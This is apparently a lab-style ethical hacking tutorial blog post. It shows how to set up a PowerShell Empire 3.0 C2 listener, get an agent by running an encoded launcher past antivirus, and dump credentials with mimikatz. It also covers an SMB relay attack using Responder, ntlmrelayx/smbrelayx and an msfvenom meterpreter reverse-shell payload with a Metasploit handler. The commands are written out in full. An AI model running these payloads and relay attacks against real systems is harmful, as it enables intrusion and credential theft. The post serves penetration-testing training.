Select Page

BC-Security now maintains a fork of the original, its new project is PowerShell Empire 3.0. In the online ethical hacking course Become An Ethical Hacker you will learn how to use PowerShell Empire 3.0 for Windows privilege escalation, and network penetration testing.

How To Install PowerShell Empire

From the official Github page, you can install Empire using the Kali repo or by doing a git clone from the Github repo.

Kali

You can install the latest version of Empire by running the following:

sudo apt install powershell-empire

Github

To install and run:

git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh

Setting Up A Listener

First steps are to start Powershell Empire 3.0 and this is followed by setting a listener.

The required fields must receive settings by you. For example we must set the listening port, I will use 4444.

Once those settings that are required are set you can start the listener by using the execute command. This basically starts an HTTP Flask Python web app that serves up the C2 command and control server you will use to send commands.

Execute Launcher For Your First Empire Agent

For simplicity’s sake we can use PowerShell ISE to execute an Empire launcher. Simply copy and paste the base64-encoded launcher string into a PowerShell ISE prompt to set it off and get an agent back to your new listener.

Hit enter and make sure that antivirus is not stopping execution.

Using PowerShell Empire Agents

Your listener will automatically print out the activity, showing a new stager has just checked in.

I prefer to rename the agents to a friendlier name.

Using Mimikatz With PowerShell Empire

You can use mimikatz with PowerShell Empire 3 to dump credentials from memory. When we ran the Empire launcher it was running under the beh user context, which is an administrator user, but the process is not running with administrator-level privilege.

To solve this, to keep things simple, simply run the PowerShell ISE prompt as an admin and copy and paste the Empire launcher in it once more.

Notice how there is an asterisk near the username for agent2. This means it is running under the context of a local administrator.

Next we need to use the usemodule command to select a module, for example to use mimikatz and its logonpasswords function. *Note* WAIT! Once you issue the task to the agent, wait a minute for the task to launch and complete. If you don’t then it will likely necessary to go back and do it again.

Why are there the password fields empty? Where (null) is there used to plaintext passwords found in memory. But from Windows 8.1 and above it will only have the NTLM hash and not the NTLM hash plus any cached plaintext credentials.

Execute Empire Launcher With SMB Relay Attack

As of this writing in November 2020, using Impacket’s smbrelayx to execute a payload via SMB Relay Attack is not working. If you have another experience please let me know in the comments!

The steps to perform an SMB Relay Attack are simple however:

  • Create a payload.
  • Edit Responder.conf to exclude HTTP and SMB.
  • Start Responder.
  • Start smbrelayx with parameters to send the new payload to a target host.
  • Send fake network SMB requests. (net view \\fakeshare)

If you are using a meterpreter payload (meterpreter/reverse_tcp) then you need to use a multi-stage exploit handler to get the shell back.

Create a meterpreter payload using msfvenom.

msfvenom -p windows/x86/meterpreter/reverse_tcp LHOST=10.0.0.197 LPORT=1234 -f exe -o payload.exe

Start a multi handler in Metasploit.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.0.0.197
LHOST => 10.0.0.197
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > run

Edit Responder.conf to exclude HTTP and SMB.

root@kali:/home/kali# nano /etc/responder/Responder.conf

; Servers to start
SQL = On
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On

Start responder to send poisoned LLMNR & NBT-NS responses.

Now send fake network requests to kick off the whole scheme.

On a Windows target, Windows 10 for example, type in net view \\fakeshare.

Start Smbrelayx To Send The Payload

ntlmrelayx.py -tf targets.txt -c <Empire launcher code here>

Or alternatively you can send an executable.

root@kali:/home/kali/impacket-master/examples# smbrelayx.py -h 10.0.0.64 -e /home/kali/payload.exe

It looks like smbrelayx is not working still since it always ends with a timeout.

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.


error: